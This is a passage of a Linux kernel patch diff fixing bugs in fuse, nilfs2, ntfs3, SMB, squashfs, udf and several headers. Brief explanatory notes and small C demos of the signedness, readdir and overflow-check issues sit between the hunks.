+ 	uint32_t opcode;
+-	unsigned short in_numargs;
+-	unsigned short out_numargs;
++	uint8_t in_numargs;
++	uint8_t out_numargs;
++	uint8_t ext_idx;
+ 	bool force:1;
+ 	bool noreply:1;
+ 	bool nocreds:1;
+@@ -276,6 +277,7 @@ struct fuse_args {
+ 	bool page_zeroing:1;
+ 	bool page_replace:1;
+ 	bool may_block:1;
++	bool is_ext:1;
+ 	struct fuse_in_arg in_args[3];
+ 	struct fuse_arg out_args[2];
+ 	void (*end)(struct fuse_mount *fm, struct fuse_args *args, int error);
+@@ -1235,7 +1237,7 @@ int fuse_reverse_inval_inode(struct fuse_conn *fc, u64 nodeid,
+  * then the dentry is unhashed (d_delete()).
+  */
+ int fuse_reverse_inval_entry(struct fuse_conn *fc, u64 parent_nodeid,
+-			     u64 child_nodeid, struct qstr *name);
++			     u64 child_nodeid, struct qstr *name, u32 flags);
+ 
+ int fuse_do_open(struct fuse_mount *fm, u64 nodeid, struct file *file,
+ 		 bool isdir);
+diff --git a/fs/fuse/inode.c b/fs/fuse/inode.c
+index 64618548835b4..332cc885b815e 100644
+--- a/fs/fuse/inode.c
++++ b/fs/fuse/inode.c
+@@ -1327,7 +1327,8 @@ void fuse_send_init(struct fuse_mount *fm)
+ 		FUSE_ABORT_ERROR | FUSE_MAX_PAGES | FUSE_CACHE_SYMLINKS |
+ 		FUSE_NO_OPENDIR_SUPPORT | FUSE_EXPLICIT_INVAL_DATA |
+ 		FUSE_HANDLE_KILLPRIV_V2 | FUSE_SETXATTR_EXT | FUSE_INIT_EXT |
+-		FUSE_SECURITY_CTX;
++		FUSE_SECURITY_CTX |
++		FUSE_HAS_EXPIRE_ONLY;
+ #ifdef CONFIG_FUSE_DAX
+ 	if (fm->fc->dax)
+ 		flags |= FUSE_MAP_ALIGNMENT;
+diff --git a/fs/fuse/xattr.c b/fs/fuse/xattr.c
+index 0d3e7177fce0a..4def41e607cc4 100644
+--- a/fs/fuse/xattr.c
++++ b/fs/fuse/xattr.c
+@@ -81,7 +81,7 @@ ssize_t fuse_getxattr(struct inode *inode, const char *name, void *value,
+ 	}
+ 	ret = fuse_simple_request(fm, &args);
+ 	if (!ret && !size)
+-		ret = min_t(ssize_t, outarg.size, XATTR_SIZE_MAX);
++		ret = min_t(size_t, outarg.size, XATTR_SIZE_MAX);
+ 	if (ret == -ENOSYS) {
+ 		fm->fc->no_getxattr = 1;
+ 		ret = -EOPNOTSUPP;
+@@ -143,7 +143,7 @@ ssize_t fuse_listxattr(struct dentry *entry, char *list, size_t size)
+ 	}
+ 	ret = fuse_simple_request(fm, &args);
+ 	if (!ret && !size)
+-		ret = min_t(ssize_t, outarg.size, XATTR_LIST_MAX);
++		ret = min_t(size_t, outarg.size, XATTR_LIST_MAX);
+ 	if (ret > 0 && size)
+ 		ret = fuse_verify_xattr_list(list, ret);
+ 	if (ret == -ENOSYS) {
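
The one-character type change matters on 32-bit builds, where ssize_t is a 32-bit signed type: a server-controlled outarg.size above 0x7fffffff turns negative after the cast, and min_t() then returns the bogus negative value instead of clamping to XATTR_SIZE_MAX/XATTR_LIST_MAX. A standalone userspace demonstration with a simplified min_t():

#include <stdint.h>
#include <stdio.h>

#define min_t(type, a, b) ((type)(a) < (type)(b) ? (type)(a) : (type)(b))

int main(void)
{
	uint32_t reported = 0x90000000u;	/* size picked by the server */
	uint32_t list_max = 65536;		/* stand-in for XATTR_LIST_MAX */

	/* a 32-bit ssize_t behaves like int32_t: the huge size "wins" as a negative */
	printf("signed:   %d\n", min_t(int32_t, reported, list_max));
	/* the unsigned comparison clamps as intended */
	printf("unsigned: %u\n", min_t(uint32_t, reported, list_max));
	return 0;
}
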
+diff --git a/fs/nfs/super.c b/fs/nfs/super.c
+index 05ae23657527d..f7b4df29ac5f0 100644
+--- a/fs/nfs/super.c
++++ b/fs/nfs/super.c
+@@ -47,6 +47,7 @@
+ #include <linux/vfs.h>
+ #include <linux/inet.h>
+ #include <linux/in6.h>
++#include <linux/sched.h>
+ #include <linux/slab.h>
+ #include <net/ipv6.h>
+ #include <linux/netdevice.h>
+@@ -219,6 +220,7 @@ static int __nfs_list_for_each_server(struct list_head *head,
+ 		ret = fn(server, data);
+ 		if (ret)
+ 			goto out;
++		cond_resched();
+ 		rcu_read_lock();
+ 	}
+ 	rcu_read_unlock();
+diff --git a/fs/nilfs2/recovery.c b/fs/nilfs2/recovery.c
+index a9b8d77c8c1d5..ce30b51ac593c 100644
+--- a/fs/nilfs2/recovery.c
++++ b/fs/nilfs2/recovery.c
+@@ -708,6 +708,33 @@ static void nilfs_finish_roll_forward(struct the_nilfs *nilfs,
+ 	brelse(bh);
+ }
+ 
++/**
++ * nilfs_abort_roll_forward - cleaning up after a failed rollforward recovery
++ * @nilfs: nilfs object
++ */
++static void nilfs_abort_roll_forward(struct the_nilfs *nilfs)
++{
++	struct nilfs_inode_info *ii, *n;
++	LIST_HEAD(head);
++
++	/* Abandon inodes that have read recovery data */
++	spin_lock(&nilfs->ns_inode_lock);
++	list_splice_init(&nilfs->ns_dirty_files, &head);
++	spin_unlock(&nilfs->ns_inode_lock);
++	if (list_empty(&head))
++		return;
++
++	set_nilfs_purging(nilfs);
++	list_for_each_entry_safe(ii, n, &head, i_dirty) {
++		spin_lock(&nilfs->ns_inode_lock);
++		list_del_init(&ii->i_dirty);
++		spin_unlock(&nilfs->ns_inode_lock);
++
++		iput(&ii->vfs_inode);
++	}
++	clear_nilfs_purging(nilfs);
++}
++
+ /**
+  * nilfs_salvage_orphan_logs - salvage logs written after the latest checkpoint
+  * @nilfs: nilfs object
+@@ -766,15 +793,19 @@ int nilfs_salvage_orphan_logs(struct the_nilfs *nilfs,
+ 		if (unlikely(err)) {
+ 			nilfs_err(sb, "error %d writing segment for recovery",
+ 				  err);
+-			goto failed;
++			goto put_root;
+ 		}
+ 
+ 		nilfs_finish_roll_forward(nilfs, ri);
+ 	}
+ 
+- failed:
++put_root:
+ 	nilfs_put_root(root);
+ 	return err;
++
++failed:
++	nilfs_abort_roll_forward(nilfs);
++	goto put_root;
+ }
+ 
+ /**
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 5110c50be2918..6bc8ad0d41f87 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -1833,6 +1833,9 @@ static void nilfs_segctor_abort_construction(struct nilfs_sc_info *sci,
+ 	nilfs_abort_logs(&logs, ret ? : err);
+ 
+ 	list_splice_tail_init(&sci->sc_segbufs, &logs);
++	if (list_empty(&logs))
++		return; /* if the first segment buffer preparation failed */
++
+ 	nilfs_cancel_segusage(&logs, nilfs->ns_sufile);
+ 	nilfs_free_incomplete_logs(&logs, nilfs);
+ 
+@@ -2077,7 +2080,7 @@ static int nilfs_segctor_do_construct(struct nilfs_sc_info *sci, int mode)
+ 
+ 		err = nilfs_segctor_begin_construction(sci, nilfs);
+ 		if (unlikely(err))
+-			goto out;
++			goto failed;
+ 
+ 		/* Update time stamp */
+ 		sci->sc_seg_ctime = ktime_get_real_seconds();
+@@ -2140,10 +2143,9 @@ static int nilfs_segctor_do_construct(struct nilfs_sc_info *sci, int mode)
+ 	return err;
+ 
+  failed_to_write:
+-	if (sci->sc_stage.flags & NILFS_CF_IFILE_STARTED)
+-		nilfs_redirty_inodes(&sci->sc_dirty_files);
+-
+  failed:
++	if (mode == SC_LSEG_SR && nilfs_sc_cstage_get(sci) >= NILFS_ST_IFILE)
++		nilfs_redirty_inodes(&sci->sc_dirty_files);
+ 	if (nilfs_doing_gc())
+ 		nilfs_redirty_inodes(&sci->sc_gc_inodes);
+ 	nilfs_segctor_abort_construction(sci, nilfs, err);
+diff --git a/fs/nilfs2/sysfs.c b/fs/nilfs2/sysfs.c
+index 379d22e28ed62..905c7eadf9676 100644
+--- a/fs/nilfs2/sysfs.c
++++ b/fs/nilfs2/sysfs.c
+@@ -836,9 +836,15 @@ ssize_t nilfs_dev_revision_show(struct nilfs_dev_attr *attr,
+ 				struct the_nilfs *nilfs,
+ 				char *buf)
+ {
+-	struct nilfs_super_block **sbp = nilfs->ns_sbp;
+-	u32 major = le32_to_cpu(sbp[0]->s_rev_level);
+-	u16 minor = le16_to_cpu(sbp[0]->s_minor_rev_level);
++	struct nilfs_super_block *raw_sb;
++	u32 major;
++	u16 minor;
++
++	down_read(&nilfs->ns_sem);
++	raw_sb = nilfs->ns_sbp[0];
++	major = le32_to_cpu(raw_sb->s_rev_level);
++	minor = le16_to_cpu(raw_sb->s_minor_rev_level);
++	up_read(&nilfs->ns_sem);
+ 
+ 	return sysfs_emit(buf, "%d.%d\n", major, minor);
+ }
+@@ -856,8 +862,13 @@ ssize_t nilfs_dev_device_size_show(struct nilfs_dev_attr *attr,
+ 				    struct the_nilfs *nilfs,
+ 				    char *buf)
+ {
+-	struct nilfs_super_block **sbp = nilfs->ns_sbp;
+-	u64 dev_size = le64_to_cpu(sbp[0]->s_dev_size);
++	struct nilfs_super_block *raw_sb;
++	u64 dev_size;
++
++	down_read(&nilfs->ns_sem);
++	raw_sb = nilfs->ns_sbp[0];
++	dev_size = le64_to_cpu(raw_sb->s_dev_size);
++	up_read(&nilfs->ns_sem);
+ 
+ 	return sysfs_emit(buf, "%llu\n", dev_size);
+ }
+@@ -879,9 +890,15 @@ ssize_t nilfs_dev_uuid_show(struct nilfs_dev_attr *attr,
+ 			    struct the_nilfs *nilfs,
+ 			    char *buf)
+ {
+-	struct nilfs_super_block **sbp = nilfs->ns_sbp;
++	struct nilfs_super_block *raw_sb;
++	ssize_t len;
+ 
+-	return sysfs_emit(buf, "%pUb\n", sbp[0]->s_uuid);
++	down_read(&nilfs->ns_sem);
++	raw_sb = nilfs->ns_sbp[0];
++	len = sysfs_emit(buf, "%pUb\n", raw_sb->s_uuid);
++	up_read(&nilfs->ns_sem);
++
++	return len;
+ }
+ 
+ static
+@@ -889,10 +906,16 @@ ssize_t nilfs_dev_volume_name_show(struct nilfs_dev_attr *attr,
+ 				    struct the_nilfs *nilfs,
+ 				    char *buf)
+ {
+-	struct nilfs_super_block **sbp = nilfs->ns_sbp;
++	struct nilfs_super_block *raw_sb;
++	ssize_t len;
++
++	down_read(&nilfs->ns_sem);
++	raw_sb = nilfs->ns_sbp[0];
++	len = scnprintf(buf, sizeof(raw_sb->s_volume_name), "%s\n",
++			raw_sb->s_volume_name);
++	up_read(&nilfs->ns_sem);
+ 
+-	return scnprintf(buf, sizeof(sbp[0]->s_volume_name), "%s\n",
+-			 sbp[0]->s_volume_name);
++	return len;
+ }
+ 
+ static const char dev_readme_str[] =
+diff --git a/fs/ntfs3/dir.c b/fs/ntfs3/dir.c
+index dcd689ed4baae..a4ab0164d150d 100644
+--- a/fs/ntfs3/dir.c
++++ b/fs/ntfs3/dir.c
+@@ -272,9 +272,12 @@ struct inode *dir_search_u(struct inode *dir, const struct cpu_str *uni,
+ 	return err == -ENOENT ? NULL : err ? ERR_PTR(err) : inode;
+ }
+ 
+-static inline int ntfs_filldir(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+-			       const struct NTFS_DE *e, u8 *name,
+-			       struct dir_context *ctx)
++/*
++ * returns false if 'ctx' is full
++ */
++static inline bool ntfs_dir_emit(struct ntfs_sb_info *sbi,
++				 struct ntfs_inode *ni, const struct NTFS_DE *e,
++				 u8 *name, struct dir_context *ctx)
+ {
+ 	const struct ATTR_FILE_NAME *fname;
+ 	unsigned long ino;
+@@ -284,29 +287,29 @@ static inline int ntfs_filldir(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 	fname = Add2Ptr(e, sizeof(struct NTFS_DE));
+ 
+ 	if (fname->type == FILE_NAME_DOS)
+-		return 0;
++		return true;
+ 
+ 	if (!mi_is_ref(&ni->mi, &fname->home))
+-		return 0;
++		return true;
+ 
+ 	ino = ino_get(&e->ref);
+ 
+ 	if (ino == MFT_REC_ROOT)
+-		return 0;
++		return true;
+ 
+ 	/* Skip meta files, unless the option to show metafiles is set. */
+ 	if (!sbi->options->showmeta && ntfs_is_meta_file(sbi, ino))
+-		return 0;
++		return true;
+ 
+ 	if (sbi->options->nohidden && (fname->dup.fa & FILE_ATTRIBUTE_HIDDEN))
+-		return 0;
++		return true;
+ 
+ 	name_len = ntfs_utf16_to_nls(sbi, fname->name, fname->name_len, name,
+ 				     PATH_MAX);
+ 	if (name_len <= 0) {
+ 		ntfs_warn(sbi->sb, "failed to convert name for inode %lx.",
+ 			  ino);
+-		return 0;
++		return true;
+ 	}
+ 
+ 	/*
+@@ -336,17 +339,20 @@ static inline int ntfs_filldir(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 		}
+ 	}
+ 
+-	return !dir_emit(ctx, (s8 *)name, name_len, ino, dt_type);
++	return dir_emit(ctx, (s8 *)name, name_len, ino, dt_type);
+ }
+ 
+ /*
+  * ntfs_read_hdr - Helper function for ntfs_readdir().
++ *
++ * returns 0 if ok.
++ * returns -EINVAL if directory is corrupted.
++ * returns +1 if 'ctx' is full.
+  */
+ static int ntfs_read_hdr(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 			 const struct INDEX_HDR *hdr, u64 vbo, u64 pos,
+ 			 u8 *name, struct dir_context *ctx)
+ {
+-	int err;
+ 	const struct NTFS_DE *e;
+ 	u32 e_size;
+ 	u32 end = le32_to_cpu(hdr->used);
+@@ -354,12 +360,12 @@ static int ntfs_read_hdr(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 
+ 	for (;; off += e_size) {
+ 		if (off + sizeof(struct NTFS_DE) > end)
+-			return -1;
++			return -EINVAL;
+ 
+ 		e = Add2Ptr(hdr, off);
+ 		e_size = le16_to_cpu(e->size);
+ 		if (e_size < sizeof(struct NTFS_DE) || off + e_size > end)
+-			return -1;
++			return -EINVAL;
+ 
+ 		if (de_is_last(e))
+ 			return 0;
+@@ -369,14 +375,15 @@ static int ntfs_read_hdr(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 			continue;
+ 
+ 		if (le16_to_cpu(e->key_size) < SIZEOF_ATTRIBUTE_FILENAME)
+-			return -1;
++			return -EINVAL;
+ 
+ 		ctx->pos = vbo + off;
+ 
+ 		/* Submit the name to the filldir callback. */
+-		err = ntfs_filldir(sbi, ni, e, name, ctx);
+-		if (err)
+-			return err;
++		if (!ntfs_dir_emit(sbi, ni, e, name, ctx)) {
++			/* ctx is full. */
++			return +1;
++		}
+ 	}
+ }
+ 
+@@ -475,8 +482,6 @@ static int ntfs_readdir(struct file *file, struct dir_context *ctx)
+ 
+ 		vbo = (u64)bit << index_bits;
+ 		if (vbo >= i_size) {
+-			ntfs_inode_err(dir, "Looks like your dir is corrupt");
+-			ctx->pos = eod;
+ 			err = -EINVAL;
+ 			goto out;
+ 		}
+@@ -499,9 +504,16 @@ static int ntfs_readdir(struct file *file, struct dir_context *ctx)
+ 	__putname(name);
+ 	put_indx_node(node);
+ 
+-	if (err == -ENOENT) {
++	if (err == 1) {
++		/* 'ctx' is full. */
++		err = 0;
++	} else if (err == -ENOENT) {
+ 		err = 0;
+ 		ctx->pos = pos;
++	} else if (err < 0) {
++		if (err == -EINVAL)
++			ntfs_inode_err(dir, "directory corrupted");
++		ctx->pos = eod;
+ 	}
+ 
+ 	return err;
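
The rework relies on the readdir contract: dir_emit() returns false when the caller's buffer is full, which is not an error; the filesystem should stop, leave ctx->pos pointing at the entry to resume from, and return 0. In outline (cursor helpers hypothetical):

static int demo_readdir(struct file *file, struct dir_context *ctx)
{
	struct demo_entry *e;

	while ((e = demo_next_entry(file, ctx->pos)) != NULL) {
		ctx->pos = e->pos;
		if (!dir_emit(ctx, e->name, e->name_len, e->ino, e->dtype))
			return 0;	/* buffer full: success, resume later */
		ctx->pos = e->pos + 1;
	}
	return 0;			/* end of directory */
}
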
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index 6cce71cc750ea..7bfdc91fae1ed 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -1601,8 +1601,10 @@ int ni_delete_all(struct ntfs_inode *ni)
+ 		asize = le32_to_cpu(attr->size);
+ 		roff = le16_to_cpu(attr->nres.run_off);
+ 
+-		if (roff > asize)
++		if (roff > asize) {
++			_ntfs_bad_inode(&ni->vfs_inode);
+ 			return -EINVAL;
++		}
+ 
+ 		/* run==1 means unpack and deallocate. */
+ 		run_unpack_ex(RUN_DEALLOCATE, sbi, ni->mi.rno, svcn, evcn, svcn,
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 2291081653a85..5e9478f31d47a 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -3443,13 +3443,15 @@ static long smb3_zero_data(struct file *file, struct cifs_tcon *tcon,
+ }
+ 
+ static long smb3_zero_range(struct file *file, struct cifs_tcon *tcon,
+-			    loff_t offset, loff_t len, bool keep_size)
++			    unsigned long long offset, unsigned long long len,
++			    bool keep_size)
+ {
+ 	struct cifs_ses *ses = tcon->ses;
+ 	struct inode *inode = file_inode(file);
+ 	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+ 	struct cifsFileInfo *cfile = file->private_data;
+-	unsigned long long new_size;
++	struct netfs_inode *ictx = netfs_inode(inode);
++	unsigned long long i_size, new_size, remote_size;
+ 	long rc;
+ 	unsigned int xid;
+ 	__le64 eof;
+@@ -3462,6 +3464,16 @@ static long smb3_zero_range(struct file *file, struct cifs_tcon *tcon,
+ 	inode_lock(inode);
+ 	filemap_invalidate_lock(inode->i_mapping);
+ 
++	i_size = i_size_read(inode);
++	remote_size = ictx->remote_i_size;
++	if (offset + len >= remote_size && offset < i_size) {
++		unsigned long long top = umin(offset + len, i_size);
++
++		rc = filemap_write_and_wait_range(inode->i_mapping, offset, top - 1);
++		if (rc < 0)
++			goto zero_range_exit;
++	}
++
+ 	/*
+ 	 * We zero the range through ioctl, so we need remove the page caches
+ 	 * first, otherwise the data may be inconsistent with the server.
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 7263889a772da..898622b52b48e 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -1703,6 +1703,8 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 		rc = ksmbd_session_register(conn, sess);
+ 		if (rc)
+ 			goto out_err;
++
++		conn->binding = false;
+ 	} else if (conn->dialect >= SMB30_PROT_ID &&
+ 		   (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
+ 		   req->Flags & SMB2_SESSION_REQ_FLAG_BINDING) {
+@@ -1781,6 +1783,8 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			sess = NULL;
+ 			goto out_err;
+ 		}
++
++		conn->binding = false;
+ 	}
+ 	work->sess = sess;
+ 
+diff --git a/fs/smb/server/transport_tcp.c b/fs/smb/server/transport_tcp.c
+index 0012919309f11..25f7c86ba9b98 100644
+--- a/fs/smb/server/transport_tcp.c
++++ b/fs/smb/server/transport_tcp.c
+@@ -622,8 +622,10 @@ int ksmbd_tcp_set_interfaces(char *ifc_list, int ifc_list_sz)
+ 		for_each_netdev(&init_net, netdev) {
+ 			if (netif_is_bridge_port(netdev))
+ 				continue;
+-			if (!alloc_iface(kstrdup(netdev->name, GFP_KERNEL)))
++			if (!alloc_iface(kstrdup(netdev->name, GFP_KERNEL))) {
++				rtnl_unlock();
+ 				return -ENOMEM;
++			}
+ 		}
+ 		rtnl_unlock();
+ 		bind_additional_ifaces = 1;
+diff --git a/fs/squashfs/inode.c b/fs/squashfs/inode.c
+index 24463145b3513..f31649080a881 100644
+--- a/fs/squashfs/inode.c
++++ b/fs/squashfs/inode.c
+@@ -276,8 +276,13 @@ int squashfs_read_inode(struct inode *inode, long long ino)
+ 		if (err < 0)
+ 			goto failed_read;
+ 
+-		set_nlink(inode, le32_to_cpu(sqsh_ino->nlink));
+ 		inode->i_size = le32_to_cpu(sqsh_ino->symlink_size);
++		if (inode->i_size > PAGE_SIZE) {
++			ERROR("Corrupted symlink\n");
++			return -EINVAL;
++		}
++
++		set_nlink(inode, le32_to_cpu(sqsh_ino->nlink));
+ 		inode->i_op = &squashfs_symlink_inode_ops;
+ 		inode_nohighmem(inode);
+ 		inode->i_data.a_ops = &squashfs_symlink_aops;
+diff --git a/fs/udf/super.c b/fs/udf/super.c
+index 3b6419f29a4c7..fa790be4f19f0 100644
+--- a/fs/udf/super.c
++++ b/fs/udf/super.c
+@@ -1084,12 +1084,19 @@ static int udf_fill_partdesc_info(struct super_block *sb,
+ 	struct udf_part_map *map;
+ 	struct udf_sb_info *sbi = UDF_SB(sb);
+ 	struct partitionHeaderDesc *phd;
++	u32 sum;
+ 	int err;
+ 
+ 	map = &sbi->s_partmaps[p_index];
+ 
+ 	map->s_partition_len = le32_to_cpu(p->partitionLength); /* blocks */
+ 	map->s_partition_root = le32_to_cpu(p->partitionStartingLocation);
++	if (check_add_overflow(map->s_partition_root, map->s_partition_len,
++			       &sum)) {
++		udf_err(sb, "Partition %d has invalid location %u + %u\n",
++			p_index, map->s_partition_root, map->s_partition_len);
++		return -EFSCORRUPTED;
++	}
+ 
+ 	if (p->accessType == cpu_to_le32(PD_ACCESS_TYPE_READ_ONLY))
+ 		map->s_partition_flags |= UDF_PART_FLAG_READ_ONLY;
+@@ -1145,6 +1152,14 @@ static int udf_fill_partdesc_info(struct super_block *sb,
+ 		bitmap->s_extPosition = le32_to_cpu(
+ 				phd->unallocSpaceBitmap.extPosition);
+ 		map->s_partition_flags |= UDF_PART_FLAG_UNALLOC_BITMAP;
++		/* Check whether math over bitmap won't overflow. */
++		if (check_add_overflow(map->s_partition_len,
++				       sizeof(struct spaceBitmapDesc) << 3,
++				       &sum)) {
++			udf_err(sb, "Partition %d is too long (%u)\n", p_index,
++				map->s_partition_len);
++			return -EFSCORRUPTED;
++		}
+ 		udf_debug("unallocSpaceBitmap (part %d) @ %u\n",
+ 			  p_index, bitmap->s_extPosition);
+ 	}
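
check_add_overflow() comes from <linux/overflow.h> and wraps the compiler's __builtin_add_overflow(): it returns true when the sum does not fit the destination type, which is exactly the u32 wrap both new checks guard against. A standalone example of the underlying builtin:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint32_t root = 0xfffff000u, len = 0x2000u, sum;

	if (__builtin_add_overflow(root, len, &sum))
		printf("reject: %#x + %#x wraps a u32\n", root, len);
	else
		printf("ok: %#x\n", sum);
	return 0;
}
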
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index eefb0948110ae..971186f0b7b07 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -92,6 +92,10 @@ extern const int mmap_rnd_compat_bits_max;
+ extern int mmap_rnd_compat_bits __read_mostly;
+ #endif
+ 
++#ifndef PHYSMEM_END
++# define PHYSMEM_END	((1ULL << MAX_PHYSMEM_BITS) - 1)
++#endif
++
+ #include <asm/page.h>
+ #include <asm/processor.h>
+ 
+diff --git a/include/linux/regulator/consumer.h b/include/linux/regulator/consumer.h
+index a9ca87a8f4e61..60bc7e143869b 100644
+--- a/include/linux/regulator/consumer.h
++++ b/include/linux/regulator/consumer.h
+@@ -244,6 +244,8 @@ int regulator_disable_deferred(struct regulator *regulator, int ms);
+ 
+ int __must_check regulator_bulk_get(struct device *dev, int num_consumers,
+ 				    struct regulator_bulk_data *consumers);
++int __must_check of_regulator_bulk_get_all(struct device *dev, struct device_node *np,
++					   struct regulator_bulk_data **consumers);
+ int __must_check devm_regulator_bulk_get(struct device *dev, int num_consumers,
+ 					 struct regulator_bulk_data *consumers);
+ void devm_regulator_bulk_put(struct regulator_bulk_data *consumers);
+@@ -479,6 +481,20 @@ static inline int devm_regulator_bulk_get(struct device *dev, int num_consumers,
+ 	return 0;
+ }
+ 
++static inline int of_regulator_bulk_get_all(struct device *dev, struct device_node *np,
++					    struct regulator_bulk_data **consumers)
++{
++	return 0;
++}
++
++static inline int devm_regulator_bulk_get_const(
++	struct device *dev, int num_consumers,
++	const struct regulator_bulk_data *in_consumers,
++	struct regulator_bulk_data **out_consumers)
++{
++	return 0;
++}
++
+ static inline int regulator_bulk_enable(int num_consumers,
+ 					struct regulator_bulk_data *consumers)
+ {
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 9df7e29386bcc..98c0a82bd5338 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -187,7 +187,6 @@ struct blocked_key {
+ struct smp_csrk {
+ 	bdaddr_t bdaddr;
+ 	u8 bdaddr_type;
+-	u8 link_type;
+ 	u8 type;
+ 	u8 val[16];
+ };
+@@ -197,7 +196,6 @@ struct smp_ltk {
+ 	struct rcu_head rcu;
+ 	bdaddr_t bdaddr;
+ 	u8 bdaddr_type;
+-	u8 link_type;
+ 	u8 authenticated;
+ 	u8 type;
+ 	u8 enc_size;
+@@ -212,7 +210,6 @@ struct smp_irk {
+ 	bdaddr_t rpa;
+ 	bdaddr_t bdaddr;
+ 	u8 addr_type;
+-	u8 link_type;
+ 	u8 val[16];
+ };
+ 
+@@ -220,8 +217,6 @@ struct link_key {
+ 	struct list_head list;
+ 	struct rcu_head rcu;
+ 	bdaddr_t bdaddr;
+-	u8 bdaddr_type;
+-	u8 link_type;
+ 	u8 type;
+ 	u8 val[HCI_LINK_KEY_SIZE];
+ 	u8 pin_len;
+diff --git a/include/uapi/drm/drm_fourcc.h b/include/uapi/drm/drm_fourcc.h
+index 868d6909b7182..6245928d76ee5 100644
+--- a/include/uapi/drm/drm_fourcc.h
++++ b/include/uapi/drm/drm_fourcc.h
+@@ -1390,6 +1390,7 @@ drm_fourcc_canonicalize_nvidia_format_mod(__u64 modifier)
+ #define AMD_FMT_MOD_TILE_VER_GFX10 2
+ #define AMD_FMT_MOD_TILE_VER_GFX10_RBPLUS 3
+ #define AMD_FMT_MOD_TILE_VER_GFX11 4
++#define AMD_FMT_MOD_TILE_VER_GFX12 5
+ 
+ /*
+  * 64K_S is the same for GFX9/GFX10/GFX10_RBPLUS and hence has GFX9 as canonical
+@@ -1400,6 +1401,8 @@ drm_fourcc_canonicalize_nvidia_format_mod(__u64 modifier)
+ /*
+  * 64K_D for non-32 bpp is the same for GFX9/GFX10/GFX10_RBPLUS and hence has
+  * GFX9 as canonical version.
++ *
++ * 64K_D_2D on GFX12 is identical to 64K_D on GFX11.
+  */
+ #define AMD_FMT_MOD_TILE_GFX9_64K_D 10
+ #define AMD_FMT_MOD_TILE_GFX9_64K_S_X 25
+@@ -1407,6 +1410,21 @@ drm_fourcc_canonicalize_nvidia_format_mod(__u64 modifier)
+ #define AMD_FMT_MOD_TILE_GFX9_64K_R_X 27
+ #define AMD_FMT_MOD_TILE_GFX11_256K_R_X 31
+ 
++/* Gfx12 swizzle modes:
++ *    0 - LINEAR
++ *    1 - 256B_2D  - 2D block dimensions
++ *    2 - 4KB_2D
++ *    3 - 64KB_2D
++ *    4 - 256KB_2D
++ *    5 - 4KB_3D   - 3D block dimensions
++ *    6 - 64KB_3D
++ *    7 - 256KB_3D
++ */
++#define AMD_FMT_MOD_TILE_GFX12_256B_2D 1
++#define AMD_FMT_MOD_TILE_GFX12_4K_2D 2
++#define AMD_FMT_MOD_TILE_GFX12_64K_2D 3
++#define AMD_FMT_MOD_TILE_GFX12_256K_2D 4
++
+ #define AMD_FMT_MOD_DCC_BLOCK_64B 0
+ #define AMD_FMT_MOD_DCC_BLOCK_128B 1
+ #define AMD_FMT_MOD_DCC_BLOCK_256B 2
+diff --git a/include/uapi/linux/fuse.h b/include/uapi/linux/fuse.h
+index 76ee8f9e024af..18e56647accd4 100644
+--- a/include/uapi/linux/fuse.h
++++ b/include/uapi/linux/fuse.h
+@@ -197,6 +197,13 @@
+  *
+  *  7.37
+  *  - add FUSE_TMPFILE
++ *
++ *  7.38
++ *  - add FUSE_EXPIRE_ONLY flag to fuse_notify_inval_entry
++ *  - add FOPEN_PARALLEL_DIRECT_WRITES
++ *  - add total_extlen to fuse_in_header
++ *  - add FUSE_MAX_NR_SECCTX
++ *  - add extension header
+  */
+ 
+ #ifndef _LINUX_FUSE_H
+@@ -232,7 +239,7 @@
+ #define FUSE_KERNEL_VERSION 7
+ 
+ /** Minor version number of this interface */
+-#define FUSE_KERNEL_MINOR_VERSION 37
++#define FUSE_KERNEL_MINOR_VERSION 38
+ 
+ /** The node ID of the root inode */
+ #define FUSE_ROOT_ID 1
+@@ -304,6 +311,7 @@ struct fuse_file_lock {
+  * FOPEN_CACHE_DIR: allow caching this directory
+  * FOPEN_STREAM: the file is stream-like (no file position at all)
+  * FOPEN_NOFLUSH: don't flush data cache on close (unless FUSE_WRITEBACK_CACHE)
++ * FOPEN_PARALLEL_DIRECT_WRITES: Allow concurrent direct writes on the same inode
+  */
+ #define FOPEN_DIRECT_IO		(1 << 0)
+ #define FOPEN_KEEP_CACHE	(1 << 1)
+@@ -311,6 +319,7 @@ struct fuse_file_lock {
+ #define FOPEN_CACHE_DIR		(1 << 3)
+ #define FOPEN_STREAM		(1 << 4)
+ #define FOPEN_NOFLUSH		(1 << 5)
++#define FOPEN_PARALLEL_DIRECT_WRITES	(1 << 6)
+ 
+ /**
+  * INIT request/reply flags
+@@ -356,6 +365,7 @@ struct fuse_file_lock {
+  * FUSE_SECURITY_CTX:	add security context to create, mkdir, symlink, and
+  *			mknod
+  * FUSE_HAS_INODE_DAX:  use per inode DAX
++ * FUSE_HAS_EXPIRE_ONLY: kernel supports expiry-only entry invalidation
+  */
+ #define FUSE_ASYNC_READ		(1 << 0)
+ #define FUSE_POSIX_LOCKS	(1 << 1)
+@@ -392,6 +402,7 @@ struct fuse_file_lock {
